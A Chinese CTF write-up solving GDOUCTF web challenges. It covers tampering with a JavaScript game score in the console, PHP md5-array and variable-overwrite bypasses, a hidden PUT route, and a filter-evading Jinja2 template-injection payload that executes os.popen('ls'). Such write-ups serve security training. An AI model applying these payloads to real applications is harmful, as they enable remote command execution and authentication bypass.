GDOUCTF

WEB

hate eat snake

这是一个JS的题目，但是这个题目好像有点奇怪，不是很理解，当时我找到了我寝室JS的大哥，跟大哥说了一下我的思路，就是他根据这个time然后/1000转化为秒，就当作是我们玩游戏的一个分数！那我把1000改掉改成10，那么整体上的返回值的结果不就变大了嘛：

但是在改的时候，发现并不能成功，甚至我想直接删掉这一行代码，直接return 固定值就好了嘛，但是不明白为什么不成功，大哥跟我说下个断点跟一下看看，后来发现，他会不断的新建实例。防止修改里面的值。后来大哥跟我说将断点下载这个函数，直接在控制台去修改：

下断成功，转去控制台，在运行的过程中，修改掉函数的返回值！

上面的语句大概类似于 Snake.prototype.getScore = function(){ return 99999}

受不了一点

考察php特性

POST传参gdou[]=1&ctf[]=2，来绕过md5的强等！增加header头：cookie=j0k3r，然后get传递aaa=114514 bbb=114514a，之后就是变量覆盖，需要存在一个GET或者是POST方式的flag。同时flag参数的值不可以等于flag，之后便是 通过遍历POST请求的内容，覆盖变量中的值，遍历GET方式，将value变量的值，赋值给key变量。因此我们可以通过GET传递get=flag 然后flag=get 那么在遍历GET的时候，形成$get=$flag,会将变量get的内容覆盖成变量flag的内容，之后再执行flag=get，又将变量get内容赋值给flag，其实主要就是为了绕过上面的两个if条件，最终输出$flag。

EZ_WEB

源码泄露，查看源代码，会发现src路由。

之后访问该路由：

发现/super-secret-route-nobody-will-guess路由，请求方式是PUT，直接通过PUT方式访问该路由即可！

ez_ze

题目上来过滤了{{}}，使用{%%}来绕过，同时过滤了点号和中括号以及下划线！

关于点号和[]被过滤的话，可以使用attr来绕过，下划线的就构造一个就可以了；

{%set pop=dict(pop=a)|join%}{%set xia=(()|select|string|list)|attr(pop)(24)%}

以上便可以构造出下划线，接下来我们尝试构造如下的payload：

lipsum.__globals__.__getitem__('os').popen('ls').read()

//接下来分别进行拼接globals getitem os popen read
{%set glo=(xia,xia,dict(globals=a)|join,xia,xia)|join%}
{%set geti=(xia,xia,dict(getit=a,em=a)|join,xia,xia)|join%}
{%set s=dict(o=a,s=a)|join%}
{%set open=dict(po=a,pen=a)|join%}
{%set read=dict(read=a)|join%}

中间的os popen 以及getitem均存在正则的匹配，拆开拼接即可！

最终形成如下payload：

{%set payload=(lipsum|attr(glo)|attr(geti)(s)|attr(open)('ls')|attr(read)())%}
{%print(payload)%}